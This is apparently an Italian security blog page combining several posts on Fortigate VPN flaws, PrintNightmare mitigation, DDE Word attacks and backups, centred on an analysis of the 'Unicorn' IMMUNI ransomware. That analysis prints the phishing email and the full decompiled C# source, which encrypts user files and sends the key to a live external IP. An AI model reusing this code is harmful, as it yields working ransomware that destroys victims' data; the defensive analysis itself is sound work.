Se l'IP pubblico non è presente nella lista puoi (per ora) tirare un sospiro di sollievo.
3 - Risolvere il problema per dormire sonni tranquilli
Se vuoi dormire serenamente questa notte consigliamo a tutti i possessori di VPN Fortigate di aggiornare subito il firmware all'ultima versione e di cambiare le credenziali di accesso al collegamento VPN.
Benjamin Delpy, ricercatore di sicurezza e creatore di Mimikatz, ha affermato di aver trovato un modo per abusare del normale metodo di installazione dei driver di stampa di Windows per ottenere privilegi di SISTEMA locale tramite driver di stampante dannosi.
1 - Mitigare il problema tramite GPO
Vai sul controller di dominio ed imposta la policy così:
Doppio click su Point and Print Restrictions policy.
Seleziona Enabled Sulle Opzioni seleziona Show warning and elevation prompt option per entrambe le checkbox
Clicca su Ok ed attenti la propagazione della GPO
2 - Aggiungere un'ulteriore blocco tramite policy sul Firewall
In una notaMicrosoft consiglia, se non prettamente necessario per l'operatività aziendale, di bloccare in uscita la porta 139 e 445 per limitare al massimo le possibilità di sfruttare questa vulnerabilità.
Ora bisogna aspettare un fix da parte di Microsoft che speriamo arrivi al più presto.
Un nuovo ransomware minaccia le farmacie e le attività che lavorano in ambito medico. Sicuramente di origine italiana questo virus rischia di mettere in ginocchio le attività in tutta la nazione.
Gli esperti di cyber security di Dottor Marc hanno ricevuto una segnalazione di un nuovo attacco ransomware che potrebbe aver preso di mira le farmacie, utilizzando un mix di tecniche di ingegneria sociale e criptazione per bloccare le attività commerciali in ambito medico.
Denominato Unicorn Ransomware, questo nuovo virus cerca di convincere l'utente a scaricare un file eseguibile e avviarlo sul proprio computer, con la promessa di offrire il versione beta l'app IMMUNI e "avere dati di prima mano aggiornati in tempo reale inerenti le situazioni di contagio sul vostro territorio".
Per aumentare la veridicità del messaggio il mittente sembra essere FEDERAZIONE ORDINI FARMACISTI ITALIANI ma come si può notare il dominio internet dei collegamenti all'interno del messaggio non è fofi.it bensì fofl.it
La letterà I è stata sostituita con la lettera L e potrebbe trarre in inganno molte persone.
Il testo dell'email inviata dai criminali è questo:
2020-05-22 COVID-19 – ANTEPRIMA NUOVA APP PER PC FISSI E PORTATILI PER MONITORARE GLI SPOSTAMENTI DEGLI INFETTI DA COVID-19
Per far fronte all'attuale emergenza sanitaria correlata alla riapertura delle attività nel nostro territorio e alla conseguente necessità di ridurre i contatti tra le persone, per contrastare e contenere il diffondersi del Covid-19, si anticipa, tramite invio di una “beta release” a tutte le farmacie, parafarmacie, università, medici condotti ed enti coinvolti nell’emergenza di sanità pubblica, la prima versione per pc dell’app IMMUNI. Questa versione potenziata, dedicata esclusivamente agli operatori sul campo, vi metterà in condizione di avere dati di prima mano aggiornati in tempo reale inerenti le situazioni di contagio sul vostro territorio. I dati vengono immediatamente condivisi dai server della Protezione Civile su tutti gli altri dispositivi connessi in streaming. Avere un monitoraggio efficace e capillare sul territorio, sarà la chiave vincente per evitare una disastrosa seconda ondata di diffusione del virus.
Di seguito trovate il link per scaricare il file eseguibile da installare sul vostro pc.
Clicca su questo link per scaricare il file eseguibile dal sito della Federazione hxxps://www.fofl.it/IMMUNI.exe
Clicca su questo link per scaricare il file .rar dal sito della federazione hxxps://www.fofl.it/IMMUNI.rar
FEDERAZIONE ORDINI FARMACISTI ITALIANI Via Palestro, 75 - 00185 Roma www.fo fl.it tel. 06.4450361 [email protected] Supporto tecnico per il sito www.fo fl.it : supporto_tecnico@ fofl.it Ufficio stampa: ufficiostampa@ fo fi.it Capo Ufficio stampa: Maurizio Imperiali tel: 334/6068949
Ransomware IMMUNI: comportamento e conseguenze dell'infezione
Il programma che viene suggerito ai malcapitati si chiama IMMUNI.exe e si mostra con un'icona che ricorda il virus che tanto abbiamo imparato a conoscere negli ultimi mesi.
Analizzando il virus sono stati rilevati e catalogati i comportamenti del ransomware in un ambiente di prova. Il virus una volta eseguito mostra una schermata volta a disorientare l'utente, una falsa mappa dei contagi a livello globale.
Virus Unicorn: la mappa dei contagi
Mentre l'utente è attratto da questa schermata il virus agisce in maniera silenziosa bloccando il computer, criptando i file e aggiungendo l'estensione .fuckunicornhtrhrtjrjy
La richiesta di riscatto, rilasciata a seguito della criptazione recita:
La lunga serpe sul bastone di Asceplio si è ribellata, ed una nuova era sta per sopraggiungere!
Questa è la vostra possibilità per redimervi dopo anni di peccati e soprusi.
Sta a voi scegliere. Entro 3 giorni il pegno pagare dovrai o il fuoco di Prometeo cancellerà
i vostri dati così come ha cancellato il potere degli Dei sugli uomini. Il pegno è di solamente 300 euros, da pagare
con i Bitcoin al seguente indirizzo : 195naAM74WpLtGHsKp9azSsXWmBCaDscxJ dopo che pagato avrai,
una email mandarci dovrai. [email protected] il codice di transazione sarà la prova.
Dopo il pegno pagato riceverai la soluzione per spegnere il fuoco di Prometeo. Andare dalla
polizia o chiamare tecnici a niente servirà, nessun essere umano aiutarti potrà.
Nel frattempo anche lo sfondo del PC viene modificato con questa immagine.
Approfondendo l'analisi tecnica i nostri esperti hanno rilevato alcune interessanti informazioni.
IMMUNI.exe : decompilazione e analisi
Questo il codice sorgente:
// Decompiled with JetBrains decompiler
// Type: fuckunicorn.Form1
// Assembly: IMMUNI, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8F54C700-FA0D-46F7-BC53-7208912E7089
// Assembly location: C:\Users\Administrator\Downloads\IMMUNI.exe
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;
namespace fuckunicorn
{
public class Form1 : Form
{
private string targetURL = "http://116.203.210.127/write.php";
private string userName = Environment.UserName;
private string computerName = Environment.MachineName.ToString();
private string userDir = "C:\";
private string backgroundImageUrl = "https://i.imgur.com/6bDNKfs.jpg";
private IContainer components;
private PictureBox pictureBox1;
private Button button1;
[DllImport("user32.dll", CharSet = CharSet.Auto)] private static extern int SystemParametersInfo( uint action, uint uParam, string vParam, uint winIni); public Form1() { this.InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { this.Opacity = 100.0; this.ShowInTaskbar = false; this.startAction(); } protected override CreateParams CreateParams { get { CreateParams createParams = base.CreateParams; createParams.ExStyle |= 128; return createParams; } } private void Form_Shown(object sender, EventArgs e) { this.Visible = true; this.Opacity = 100.0; } public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes) { byte[] salt = new byte[8] { (byte) 1, (byte) 2, (byte) 3, (byte) 4, (byte) 5, (byte) 6, (byte) 7, (byte) 8 }; using (MemoryStream memoryStream = new MemoryStream()) { using (RijndaelManaged rijndaelManaged = new RijndaelManaged()) { rijndaelManaged.KeySize = 256; rijndaelManaged.BlockSize = 128; Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passwordBytes, salt, 1000); rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.KeySize / 8); rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.BlockSize / 8); rijndaelManaged.Mode = CipherMode.CBC; using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, rijndaelManaged.CreateEncryptor(), CryptoStreamMode.Write)) { cryptoStream.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length); cryptoStream.Close(); } return memoryStream.ToArray(); } } } public string CreatePassword(int length) { StringBuilder stringBuilder = new StringBuilder(); Random random = new Random(); while (0 < length--) stringBuilder.Append("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=?()"[random.Next("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=?()".Length)]); return stringBuilder.ToString(); } public void SendPassword(string password) { try { new WebClient().DownloadString(this.targetURL + ("?computer_name=" + this.computerName + "&userName=" + this.userName + "&password=" + password + "&allow=ransom")); } catch (Exception ex) { } } public void EncryptFile(string file, string password) { byte[] bytes = this.AES_Encrypt(System.IO.File.ReadAllBytes(file), SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password))); string path = this.userDir + ("Users\\" + this.userName + "\\Desktop\\READ_IT.txt.fuckunicornhtrhrtjrjy"); if (System.IO.File.Exists(path)) System.IO.File.Delete(path); System.IO.File.WriteAllBytes(file, bytes); System.IO.File.Move(file, file + ".fuckunicornhtrhrtjrjy"); } public void encryptDirectory(string location, string password) { try { string[] strArray = new string[68] { ".txt", ".jar", ".exe", ".dat", ".contact", ".settings", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".py", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".htm", ".xml", ".psd", ".pdf", ".dll", ".c", ".cs", ".mp3", ".mp4", ".f3d", ".dwg", ".cpp", ".zip", ".rar", ".mov", ".rtf", ".bmp", ".mkv", ".avi", ".apk", ".lnk", ".iso", ".7-zip", ".ace", ".arj", ".bz2", ".cab", ".gzip", ".lzh", ".tar", ".uue", ".xz", ".z", ".001", ".mpeg", ".mp3", ".mpg", ".core", ".crproj", ".pdb", ".ico", ".pas", ".db", ".torrent" }; string[] files = Directory.GetFiles(location); string[] directories = Directory.GetDirectories(location); for (int index = 0; index < files.Length; ++index) { string extension = Path.GetExtension(files[index]); if (((IEnumerable<string>) strArray).Contains<string>(extension)) this.EncryptFile(files[index], password); } for (int index = 0; index < directories.Length; ++index) this.encryptDirectory(directories[index], password); } catch (Exception ex) { } } public void MoveVirus() { string path = this.userDir + this.userName + "\\Rand123"; string str = this.userDir + this.userName + "\\Rand123\\local.exe"; if (!Directory.Exists(path)) Directory.CreateDirectory(path); else if (System.IO.File.Exists(str)) System.IO.File.Delete(str); System.IO.File.Move(Directory.GetCurrentDirectory() + ("\\" + Process.GetCurrentProcess().ProcessName + ".exe"), str); } public static bool CheckForInternetConnection() { try { using (WebClient webClient = new WebClient()) { using (webClient.OpenRead("https://www.google.com")) return true; } } catch { return false; } } public void startAction() { this.MoveVirus(); string password = this.CreatePassword(15); this.Directory_Settings_Sending(password); this.messageCreator(); string path = this.userDir + this.userName + "\\ransom.jpg"; bool flag; do { flag = Form1.CheckForInternetConnection(); if (flag) { this.SetWallpaperFromWeb(this.backgroundImageUrl, path); this.SendPassword(password); } } while (!flag); } public void Directory_Settings_Sending(string password) { string str = "Users\\"; string location1 = this.userDir + str + this.userName + "\\Desktop"; string location2 = this.userDir + str + this.userName + "\\Links"; string location3 = this.userDir + str + this.userName + "\\Contacts"; string location4 = this.userDir + str + this.userName + "\\Desktop"; string location5 = this.userDir + str + this.userName + "\\Documents"; string location6 = this.userDir + str + this.userName + "\\Downloads"; string location7 = this.userDir + str + this.userName + "\\Pictures"; string location8 = this.userDir + str + this.userName + "\\Music"; string location9 = this.userDir + str + this.userName + "\\OneDrive"; string location10 = this.userDir + str + this.userName + "\\Saved Games"; string location11 = this.userDir + str + this.userName + "\\Favorites"; string location12 = this.userDir + str + this.userName + "\\Searches"; string location13 = this.userDir + str + this.userName + "\\Videos"; this.encryptDirectory(location1, password); this.encryptDirectory(location2, password); this.encryptDirectory(location3, password); this.encryptDirectory(location4, password); this.encryptDirectory(location5, password); this.encryptDirectory(location6, password); this.encryptDirectory(location7, password); this.encryptDirectory(location8, password); this.encryptDirectory(location9, password); this.encryptDirectory(location10, password); this.encryptDirectory(location11, password); this.encryptDirectory(location12, password); this.encryptDirectory(location13, password); } public void messageCreator() { string path = this.userDir + "Users\\" + this.userName + "\\Desktop\\READ_IT.txt"; string str = this.computerName + "-" + this.userName; string[] contents = new string[8] { "La lunga serpe sul bastone di Asceplio si è ribellata, ed una nuova era sta per sopraggiungere!", "Questa è la vostra possibilità per redimervi dopo anni di peccati e soprusi.", "Sta a voi scegliere. Entro 3 giorni il pegno pagare dovrai o il fuoco di Prometeo cancellerà", "i vostri dati così come ha cancellato il potere degli Dei sugli uomini. Il pegno è di solamente 300 euros, da pagare", "con i Bitcoin al seguente indirizzo : 195naAM74WpLtGHsKp9azSsXWmBCaDscxJ dopo che pagato avrai, ", "una email mandarci dovrai. [email protected] il codice di transazione sarà la prova.", "Dopo il pegno pagato riceverai la soluzione per spegnere il fuoco di Prometeo. Andare dalla ", "polizia o chiamare tecnici a niente servirà, nessun essere umano aiutarti potrà." }; System.IO.File.WriteAllLines(path, contents); } public void SetWallpaper(string path) { Form1.SystemParametersInfo(20U, 0U, path, 3U); } private void SetWallpaperFromWeb(string url, string path) { try { new WebClient().DownloadFile(new Uri(url), path); this.SetWallpaper(path); } catch (Exception ex) { } } private void pictureBox1_Click(object sender, EventArgs e) { } private void button1_Click(object sender, EventArgs e) { this.Close(); } protected override void Dispose(bool disposing) { if (disposing && this.components != null) this.components.Dispose(); base.Dispose(disposing); } private void InitializeComponent() { ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof (Form1)); this.pictureBox1 = new PictureBox(); this.button1 = new Button(); ((ISupportInitialize) this.pictureBox1).BeginInit(); this.SuspendLayout(); this.pictureBox1.BackgroundImage = (Image) componentResourceManager.GetObject("pictureBox1.BackgroundImage"); this.pictureBox1.Location = new Point(-2, -6); this.pictureBox1.Name = "pictureBox1"; this.pictureBox1.Size = new Size(1074, 691); this.pictureBox1.SizeMode = PictureBoxSizeMode.Zoom; this.pictureBox1.TabIndex = 0; this.pictureBox1.TabStop = false; this.pictureBox1.Click += new EventHandler(this.pictureBox1_Click); this.button1.Location = new Point(1023, 12); this.button1.Name = "button1"; this.button1.Size = new Size(29, 23); this.button1.TabIndex = 1; this.button1.Text = "X"; this.button1.UseVisualStyleBackColor = true; this.button1.Click += new EventHandler(this.button1_Click); this.AutoScaleDimensions = new SizeF(6f, 13f); this.AutoScaleMode = AutoScaleMode.Font; this.ClientSize = new Size(1064, 681); this.Controls.Add((Control) this.button1); this.Controls.Add((Control) this.pictureBox1); this.FormBorderStyle = FormBorderStyle.None; this.Icon = (Icon) componentResourceManager.GetObject("$this.Icon"); this.Name = nameof (Form1); this.Text = "Coronavirus"; this.UseWaitCursor = true; this.Load += new EventHandler(this.Form1_Load); ((ISupportInitialize) this.pictureBox1).EndInit(); this.ResumeLayout(false); }
}
}
L'analisi mostra anche un dettaglio molto importante, aumentando le ipotesi di un virus scritto da criminali italiani per vittime italiane. Il nome del creatore potrebbe essere proprio Leonardo.
Virus IMMUNI: l'origine del file infetto
L'email inviata dai criminali invita l'utente a scaricare il file infetto dal sito www.fofl.it che non è altro che la copia identica del sito ufficiale dell'FEDERAZIONE ORDINI FARMACISTI ITALIANI effettuata in data 3 maggio 2020.
L'interrogazione WHOIS del dominio FOFL.IT mostra alcune informazioni aggiuntive, come il nome del registrante, chiaramente fasullo.
Dominio registrato da NICOLAI DOMBROWSKY
Al momento della pubblicazione di questo contenuto il sito è già stato reso irraggiungibile dal servizio di hosting.
Virus IMMUNI: pagare il riscatto?
Verificando l'indirizzo su cui viene richiesto il pagamento del riscatto, al momento non risulta alcun pagamento andato a buon fine. Il nostro consiglio è di non effettuare in nessun modo questa operazione.
Virus IMMUNI: principianti allo sbaraglio?
Sono molti i fattori che possono indicare che l'origine di questo virus che cripta i file siano criminali alle prime armi, con scarse conoscenze tecniche, ma allo stesso tempo nessun timore nel diffondere una minaccia che potrebbe avere un grosso impatti a livello sociale.
Il codice del virus sembra essere un copia-incolla di altri ransomware già visti in precedenza. La diffusione è stata scarsa e il dominio truffaldino, ospitato da server tedeschi, è stato subito posto in sospensione.
Dolcis in fundo, l'email dei criminali (o forse criminale, Leonardo sei stato tu? ) indicata nella nota di riscatto.. è sbagliata! Questo impedirebbe un ipotetico contatto con la vittima, azzerando quindi la possibilità di comunicare una buona riuscita del pagamento e di conseguenza non offrendo la soluzione al blocco dei file.
Il rapido sviluppo tecnologico di questi anni ha comportato un proporzionale aumento degli attacchi informatici. I crimini informatici sono diventati più complessi e possono portare a compromettere contemporaneamente migliaia o addirittura milioni di dispositivi.
Oggi esistono vari tipi di vettori del cyber-crimine e uno dei più recenti e temuti è il ransomware, un tipo di estorsione digitale o ricatto digitale di cui abbiamo già trattato in passato.
Il ransomware è un tipo di malware che impedisce agli utenti di accedere alle risorse del proprio dispositivo informatico e / o ai dati personali memorizzati al loro interno utilizzando vari metodi. Il ransomware non intende arrecare danni al file system del computer, ma permette le funzioni di base per fornire alla vittima un modo per pagare il riscatto e visualizzare le istruzioni di pagamento.
Come può un ransomware bypassare i controlli di sicurezza?
Gli attacchi ransomware sono stati a lungo una minaccia per gli utenti di Internet, in particolare per il settore delle imprese. In assenza dell'implementazione di adeguate pratiche di sicurezza, molte aziende e organizzazioni diventano spesso vittime di questo tipo di attacchi. Di recente, uno studio ha evidenziato come la maggior parte dei virus ransomware possa bypassare i controlli di sicurezza.
Le tecniche ransomware più comuni
I ricercatori di SophosLabs hanno recentemente pubblicato un dettagliato whitepaper che evidenzia come la maggior parte dei ransomware eluda le misure di sicurezza. Sono state analizzate numerose varianti di ransomware famigerate per i loro attacchi devastanti e sono state trovate numerose tecniche che agevolano il ransomware nella sua azione.
Un virus nei file di Word senza macro? Ebbene sì, un recente virus si sta diffondendo rapidamente e chiunque utilizzi i file .doc è una potenziale vittima.
Ultimamente abbiamo notato che molte delle vittime che ci contattano hanno un elemento in comune: sono state infettate da un virus semplicemente aprendo un documento Microsoft Word apparentemente innocuo.
Microsoft Word è vulnerabile
Come funziona questo nuovo tipo di attacco?
Viene costruito un file .doc che contiene un codice particolare, chiamato Microsoft Dynamic Data Exchange (DDE) che permette, senza utilizzare codice Macro o Active-x, di eseguire dei comandi sul dispositivo dell'utente ignaro del pericolo.
Come puoi proteggerti?
Fortunatamente all'apertura del file Word vieni avvisato che c'è qualcosa di strano nel documento ed appare questa schermata:
Mi raccomando: se ricevi un documento via Mail ed all'apertura ti appare questa schermata premi sul pulsante No e chiudi immediatamente il file per evitare che il tuo computer venga infettato dal virus.
Se viene premuto il tasto Sì viene avviato il codice del virus che obbliga il computer a scaricare un malware da un sito esterno. Questo è il codice che potenzialmente potrebbe essere eseguito:
Microsoft ovviamente non si assume nessuna responsabilità sui pericoli di questa funzionalità, in quanto l'utente viene avvisato dell'apertura della sorgente esterna. Anzi, la descrivono come una "funzionalità molto utile".
In modo analogo, gli antivirus non rilevano questo collegamento come un'attività illecita. Fortunatamente alcuni riescono a rilevare il malware che viene scaricato e a bloccarlo con successo.
I consigli di Dottor Marc
per la sicurezza e la salute dei tuoi dati
Tutti noi, dall'azienda al libero professionista al privato, non possiamo essere vittime così facile dei virus che criptano i file. Questi virus e ransomware hanno avuto una diffusione così rapida soprattutto grazie alla negligenza nella gestione dei dati.
Sperare di recuperare i file criptati dai virus dovrebbe essere una soluzione da non prendere neanche in considerazione, pari al pagamento del riscatto.
Ti consigliamo di prestare particolare attenzione a questi punti per evitare di essere vittima di questi virus, con pochi e semplici accorgimenti.
Ricordati che prevenire è meglio che formattare.
Ce lo chiedono in tantissimi: Come posso vedere se i computer della mia rete sono vulnerabili a questi nuovi virus? Come posso fare una scansione della rete per verificare se posso essere attaccato da Wannacry?
Finalmente è arrivato il software che automatizza tutta la procedura di test e analisi delle vulnerabilità in rete.
Con questo semplice programma puoi analizzare in modo automatico tutti i PC della rete in modo da essere preventivamente al sicuro da nuovi virus che sfruttano queste vulnerabilità dei sistemi operativi, anche i più recenti!
IMPORTANTE! L'utilizzo di questo programma non ti mette al sicuro dalle minacce proveniente da questi virus. Per avere una rete sicura è necessario progettarla con attenzione e analizzare nel dettagli i tantissimi aspetti relativi alla sicurezza dei tuoi dati. Avere un sistema di salvataggio dei file funzionante, monitorato e sicuro, un ottimo antivirus ben configurato e utenti attenti e consapevoli dei rischi che corrono è la giusta base di partenza per dormire sonni tranquilli. Questo programma è solo uno dei dati test che devono essere effettuati all'interno di una rete di computer per verificarne la sicurezza.
Scansione della rete alla ricerca delle vulnerabilità utilizzate dai virus
Accendi TUTTI i dispositivi che hai (portatili, computer e all-in-one) ed attendi che si siano avviati completamente
Clicca sul tasto SCAN
Attendi la fine della scansione
Verifica i risultati: Se il valore corrispondente a "Vulnerable" è uguale a Zero significa chetutti i tuoi dispositivi e computer sono aggiornati all'interno della tua rete! Complimenti!
Attenzione! Questo è uno strumento che verifica se i tuoi PC sono attaccabili oggi da un'unica tipologia di virus! Il nostro consiglio è di seguire sempre l'ABC dell'azienda sicura:
A come Aggiornamento: Aggiorna sempre Windows, Antivirus, Adobe Flashplayer.
B come Backup: Un backup automatico, controllato e remoto ti può salvare dalla perdita di dati dovuti a virus ma anche dalla cancellazione involontaria degli stessi.
C come Controllo: Affidati ad una azienda che propone un contratto di manutenzione continuativa e che abbia un sistema di monitoraggio giornaliero.L'80% delle aziende che ci contattano per un recupero dei dati avevano un backup, ma non stava funzionando, e nessuno lo sapeva!
CryptoPEC, il ransomware italiano che dall'inizio di maggio 2017 ha iniziato a colpire decine di migliaia di computer italiani, è un virus che cripta i file, li rinomina con estensione .pec e chiede il pagamento di un riscatto per la decriptazione.
Da un nostro recente approfondimento, disponibile su La Stampa, è un virus totalmente italiano ed il metodo di attacco è così ben fatto da trarre in inganno anche gli utenti più attenti.
Recuperare i file criptati da PEC 2017 è finalmente possibile!
Per sapere se i tuoi file possono essere recuperati è necessario raggiungere la pagina dedicata al recupero:
Tutti noi, dall'azienda al libero professionista al privato, non possiamo essere vittime così facile dei virus che criptano i file. Cryptolocker ha avuto una diffusione così rapida soprattutto grazie alla negligenza nella gestione dei dati.
Sperare di recuperare i file criptati dal virus dovrebbe essere una soluzione da non prendere neanche in considerazione, pari al pagamento del riscatto.
Ti consigliamo di prestare particolare attenzione a questi punti per evitare di essere vittima di questi virus, con pochi e semplici accorgimenti.
Ricordati che prevenire è meglio che formattare.
La sicurezza informatica è importante, ricordati di non sottovalutarla!
Nessun anello della catena può essere debole, la sicurezza inizia dai dispositivi e finisce con le persone.
Se i file sono salvati in modo corretto, non avrai mai paura dei virus che li criptano!
Fatti consigliare da un esperto del settore e scegli bene di chi fidarti!
Si possono decriptare i file criptati da Cryptolocker?
Queste sono alcune delle domande che ci vengono poste più di frequente. Negli ultimi anni i virus che criptano i file e che chiedono il pagamento di un riscatto per la decriptazione hanno avuto una diffusione sempre maggiore, creando molti danni a privati e aziende. I file criptati con estensioni modificate possono essere decriptati in alcuni casi con pochi click, in altri attraverso l'aiuto di personale esperto in questo genere di operazioni. (altro…)
Un backup gratis? Come è possibile?
Il backup dei file è una delle attività fondamentali che un'azienda deve mettere in atto. Il rischio che il file vengano persi o danneggiati, magari da qualche versione dei recenti virus ransomware, è troppo alto per essere ignorato. Gli investimenti nelle migliorie alla struttura informatica sono molto importanti, per poter disporre di tecnologie adeguate alla propria attività e dormire sonni tranquilli, in completa sicurezza. (altro…)